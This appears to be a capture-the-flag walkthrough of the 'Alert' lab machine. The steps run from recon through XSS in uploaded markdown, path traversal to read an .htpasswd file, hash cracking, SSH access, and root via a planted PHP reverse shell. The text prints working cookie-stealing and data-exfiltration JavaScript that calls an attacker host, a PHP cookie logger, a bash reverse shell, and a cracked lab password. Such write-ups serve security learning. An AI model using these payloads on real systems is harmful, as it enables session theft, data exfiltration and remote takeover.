Recon
$nmap -p- -A 10.129.128.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
12227/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$whatweb alert.htb
http://alert.htb [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], RedirectLocation[index.php?page=alert], Title[Alert - Markdown Viewer]
http://alert.htb/index.php?page=alert [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], Title[Alert - Markdown Viewer]gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://domain.htb --append-domain -t 150
Found: statistics.alert.htb Status: 401 [Size: 467]statistics.alert.htb
Markdown visualizer
After uploading a file, we can see it on /visualizer.php.
Using the share button, we can get name of our file on the server.
Testing further, adding <script>alert(1)</script> to our file, gets us alert 1.
I was fighting with XSS to execute my file for a while, but no go. I’ve menaged to download files from my server, but not execute them. I worked on stealing cookies later, but it does
Test markdown
<script src="http://10.10.16.6/script.js"></script>new Image().src='http://10.10.16.6/index.php?c='+document.cookie<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
I tried like a moron to get user data, and got mine.
# Test markdown
<script src="http://10.10.16.6/script.js"></script>
<script
const data = {
cookies: document.cookie,
userAgent: navigator.userAgent,
url: window.location.href,
referrer: document.referrer,
platform: navigator.platform
};
fetch('http://10.10.16.6/', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(data)
});></script>But this got me an idea, that I could use the support page and embed in the message link to the site with XSS as image. So I’ve created another markdown file.
# Test markdown
<script>
fetch("http://alert.htb/")
.then(response => response.text())
.then(data => {
fetch("http://10.10.16.6/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("xss error:", error));
</script>And then click share to get link. Then upload the message to support and we finally get data.
Then we can see the contents using cybercheff.
Progres. Then, I’ve tried path traversal on messages file, with url http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf
Then we can look for htpasswd under http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd.
We got the user and hash. albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ. This hash is not on crackstation, so we have to run hashcat hashcat -m 1600 test.hash /usr/share/wordlists/rockyou.txt and we get manchesterunited.
We can then log in onto the site http://statistics.alert.htb.
The same works for ssh! We are in.
Priv Esc
Running simple enum we can see that there is something on port 8080.
Running wget and cat shows us that it is a Website Monitor, so that is out target probably. Let’s pass it back to us then with ssh -L 8080:localhost:8080 albert@alert.htb.
If we then go to /opt we can see our website-monitor. It has only one folder which belongs to menagement. Fortunetly we are in this group, uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management).
We can then modify it with exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'"); so we get get reverse shell.
<?php
define('PATH', '/opt/website-monitor');
exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'");
?>
We are done.